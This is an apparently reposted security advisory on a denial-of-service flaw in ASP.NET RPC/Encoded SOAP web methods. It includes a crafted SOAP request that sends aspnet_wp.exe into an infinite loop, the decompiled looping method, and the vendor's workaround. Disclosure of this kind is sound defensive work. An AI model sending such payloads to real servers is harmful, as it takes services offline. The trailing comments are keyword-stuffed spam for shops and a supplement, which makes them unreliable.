The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
ASP.NET RCP/Encoded Web Service DoS
------------------------------------------------------------------------
SUMMARY
By sending a custom SOAP message to an RCP/Encoded web method attackers
can cause a denial of service in Microsoft's ASP.NET enviroment.
DETAILS
By sending a custom SOAP message to an RCP/Encoded web method that accepts
an array (or any object derived from Ilist, like StringCollection or
ArrayList), attackers can cause the aspnet_wp.exe process to consume 100%
of the system resources.
If the system is a bit faster, you may add more then one request in order
to cause the DoS condition.
To replicate the issue, attackers can send a request to the Test(int[]
someList) web method defined inside the AspCrashWebService project (refer
to AspCrashWebService.zip distributed with this document). A normal SOAP
message to call this method with a single element of 0 would look like:
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:tns="http://tempuri.org/"
xmlns:types="http://tempuri.org/encodedTypes"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<tns:Test>
<someList href="#id1" />
</tns:Test>
<soapenc:Array id="id1" soapenc:arrayType="xsd:int[1]">
<Item>0</Item>
</soapenc:Array>
</soap:Body>
</soap:Envelope>
If attackers changes the <soapenc:Array> definition with the complex type
defined in demo ASPCrashWebService.Service1 WSDL definition (ArrayOfInt),
attackers will cause the problem in aspnet_wp.exe.
The new request would look like:
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:tns="http://tempuri.org/"
xmlns:types="http://tempuri.org/encodedTypes"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<tns:Test>
<someList href="#id1" />
</tns:Test>
<tns:ArrayOfInt>
<Item>0</Item>
</tns:ArrayOfint>
</soap:Body>
</soap:Envelope>
The error is caused due to an infinite loop inside
System.Xml.Serialization.Xml.XmlSerializationReader.ReadReferencedElements
(). The method can be translated to the following code:
protected void ReadReferencedElements()
{
string V_0;
r.MoveToContent();
while (r.NodeType != XmlNodeType.EndElement && r.NodeType !=
XmlNodeType.None)
{
ReadReferencingElement(null, null, true, out V_0);
r.MoveToContent();
}
DoFixups();
HandleUnreferencedObjects();
}
The problem is that after the call to ReadRefencingElement() the
r.NodeType is set to XmlNodeType.Element and the while loop never
terminates.
Vendor Status:
RCP/Encoded web services are not recommended by Microsoft. Developers
should utilize document/literal instead, which is not affected by this
issue. The Microsoft Security Response Center has stated that this issue
will be addressed in the upcoming "Whidbey" release of Web Services. In
the interim, the aspnet_wp.exe service can be restarted and operation will
resume without problems.
ADDITIONAL INFORMATION
The information has been provided by <mailto:spilabs@spidynamics.com> SPI
Labs.
The original article can be found at:
<http://www.spidynamics.com/spilabs/advisories/aspRCP.html>
http://www.spidynamics.com/spilabs/advisories/aspRCP.html
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
3 comments:
Our innovative program weaves time-honored skills of fashion practice (draping, pattern cutting, sewing, knitting, and illustration) with a comprehensive approach to sustainability, conceptual fashion design, and interdisciplinary thinking. ghd straightener If you are utilized to dressing up down but you wish to add charm to your thing, attempt acquiring some sparkly components. ghd australia The full list is on the 500 Startups site. http://www.verynorthface.com Robert Romanyshyn, a depth psychologist currently based at Pacifica Graduate Institute, first came to my attention through David Kidner brilliant book Nature Psyche. ghd new wave limited edition The Shoop has the most different colors to decide on from, with some really striking tops in purples, yellows, and pinks whilst the Skii is the classy option to the standard sweatshirt.
If you want to find out much more about vimax, If you want to understand additional about vimax
If you want to discover far more about vimax, If you want to find out additional about vimax
If you want to understand much more about vimax, If you want to understand additional about vimax
If you want to find out more about vimax, If you want to discover additional about vimax
If you want to discover much more about vimax, If you want to study additional about vimax
If you want to understand much more about vimax, If you want to discover much more about vimax
If you want to study more about vimax, If you want to find out a lot more about vimax
If you want to find out more about vimax, If you want to study a lot more about vimax
If you want to find out more about vimax, If you want to understand far more about vimax
If you want to discover much more about vimax, If you want to learn more about vimax
If you want to study more about vimax, If you want to understand a lot more about vimax
The very "it" ombre hair was seen in a variety of vibrancies, on a variety of lengths; which leads me to believe this might be the first hair trend that seems to work on everyone. http://www.morenorthface.com During practices, I would ask, 'Am I doing okay?' And they would say, 'Less smiles, less smiles!'". north face jackets on sale The benefits well outweigh the time involved and soon you will have jewelry boxes full of your unique creations that no one else has ever seen. north face coats I appreciated the creativity and the drama, albeit somewhat menacing.. north face canada Shopping for women scarves is best when done online because of the large choice to choose from.
Post a Comment